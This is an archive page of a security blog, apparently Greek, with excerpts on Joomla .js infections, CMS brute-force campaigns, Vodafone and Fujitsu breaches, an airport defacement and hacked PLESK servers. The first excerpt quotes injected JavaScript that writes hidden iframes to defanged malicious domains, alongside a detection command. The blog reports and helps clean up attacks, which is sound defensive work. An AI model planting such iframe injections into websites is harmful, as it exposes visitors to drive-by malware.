Archive for 'Hacking'

New Joomla infections (?) mustmoneyback.cgi

Today, looking at some systems, I noticed a new pattern in some .js files. Multiple files were infected with the following code:
;document.write('<iframe src="hxxp://hfxgr.sellClassics.com/mustmoneyback.cgi?3" align="center" height="5" width="5"></iframe>');
;document.write('<iframe src="hxxp://lenslifcs.mynumber.org/mustmoneyback.cgi?3" align="center" height="5" width="5"></iframe>');
Other domains were also found with the same .cgi file calls. An easy way to look for infections on PLESK systems is the following:
find /var/www/vhosts/ -type f -name '*.js' -print0 | xargs -0 egrep -iw "(km0ae9gr6m|mustmoneyback)"
After locating the infections one can clean up the files …


WordPress/Joomla CMS brute force attacks (more than 25k sites)

A targeted brute-force attack on WordPress/Joomla/Drupal and other CMS-based websites came to our notice today. The list of the attacked hosts contains more than 25000 websites (http://my-audit.gr/attacked_cms_list.html) and, considering that it starts from the letter m and below, this appears to be just a part of a larger document.
The attack is being initiated through compromised Windows systems where the following files are being uploaded:
30/03/2012  08:57 πμ           624.640 ctfmon.exe
25/09/2012  03:13 μμ                 0 good.txt
21/07/2012  12:50 μμ                 …


Vodafone Greece hacked…

DAMAGE REACHING 690.000 EUROS
FRAUD AGAINST VODAFONE
Vodafone suffered a loss of 690 thousand euros from the non-recording of mobile internet usage that took place over its network. The incident was made known by the Cyber Crime Unit as follows: using an advanced method of electronic intrusion, of the cracking type, into the company's computer systems, those involved gained access to the management data and illegally sold internet connections in Cuba. Specifically, the three perpetrators managed to penetrate electro- …


Fujitsu hacked by Anonymous..

As reported on pastebin.com, Fujitsu General DBs were leaked last week.
http://pastebin.com/1YMJPa8h
The method used was SQL Injection on http://www.fujitsugeneral.com.br/onde-encontrar.aspx?estado=UF&cidade=cidade&bairro=bairro&tabela=Revendas, which seems to have been corrected at this point, but this is once again an example of how vulnerable our personal information is and how cautious we must be about posting our personal details, even on big and trusted sites.
Let us not forget what happened last year with Sony, even if Fujitsu has much less information on …


Greece International Airport (AIA / El. Venizelos) hacked!!

Last night Iranian hackers compromised AIA's page, demonstrating once again how loose the security is on major Greek sites.
As said in the past, in Greece organisations and government are paying a lot of money for simple web site development and promotion but are not considering security at all.
Up to this minute www.aia.gr remains hacked (and will probably remain so until tomorrow). my-audit.gr has informed the Airport security about this hack, but as usual we are not expecting any …


3.094 Hacked PLESK servers, more than 15.000 domains and this is just 3%

I wrote before about the infected PLESK systems, and Brian Krebs wrote about the topic some time later in the year (http://krebsonsecurity.com/2012/07/plesk-0day-for-sale-as-thousands-of-sites-hacked/), but until now I haven't seen any post on the actual infected servers.
I took some time during the holidays to fix my http-plesk-backdoor.nse script and run a wider search for infected and still compromised PLESK installations. The work is still in progress and the stats below are rough stats.
There are 256 class A networks, 0.0.0.0/8 …
